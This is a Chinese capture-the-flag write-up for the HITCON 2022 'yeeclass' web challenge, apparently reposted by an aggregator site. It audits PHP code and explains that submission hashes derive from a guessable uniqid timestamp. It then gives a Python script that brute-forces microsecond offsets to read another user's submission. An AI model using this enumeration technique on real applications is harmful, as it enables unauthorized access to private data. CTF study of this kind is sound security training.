复现平台CTFHUB 靶机为一个完整类论坛网页,题目给了服务端完整代码 代码审计 /src/submit.PHP Line56-63: 可以看到提交数据存入的时候将$_SESSioN["userna
复现平台CTFHUB
靶机为一个完整类论坛网页,题目给了服务端完整代码
/src/submit.PHP Line56-63:
可以看到提交数据存入的时候将$_SESSioN["username"]."_"
作为前缀,生成了一个uniqid。uniqid的生成方式即{sec:08x}{usec:05x}
/src/submission.php Line5-15:
在该查询界面中首选了hash
参数作为查询方式,
意味着如果获得存入数据库的时间
和username
即可模拟出hash
从而读取flag
/src/submission.php Line16-44:
允许了通过homeworkid
查询入库时间
和username
在没有登录没有session
访问challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?homeworkid=1得到提交时间
和username
而入库时间和uniqid
由于运行效率,会存在微秒时间差,因而需要爆破该时间差
exp
import requestsimport hashlibfrom datetime import datetime, timezoneusername = "flagholder"timestamp = '2022-12-26 20:59:48.231534'dt = datetime.fromisofORMat(timestamp)#.replace(tzinfo=timezone.utc)sec = int(dt.timestamp())usec = dt.microsecondprint(sec, usec)url = 'Http://challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?hash='def get_hash(sec, usec): user_id = f"{username}_{sec:08x}{usec:05x}" return hashlib.sha1(user_id.encode()).hexdigest()for i in range(0, 1000): hash = get_hash(sec, usec - i) r = requests.get(url + hash) print(i, hash) if r.text != "Submission not found.": print("Found hash:", hash) print(r.text) break
运行结果:
来源地址:https://blog.csdn.net/qq_66748496/article/details/128454462
--结束END--
本文标题: 2022-HitCon-Web-yeeclass WP
本文链接: https://www.lsjlt.com/news/385492.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0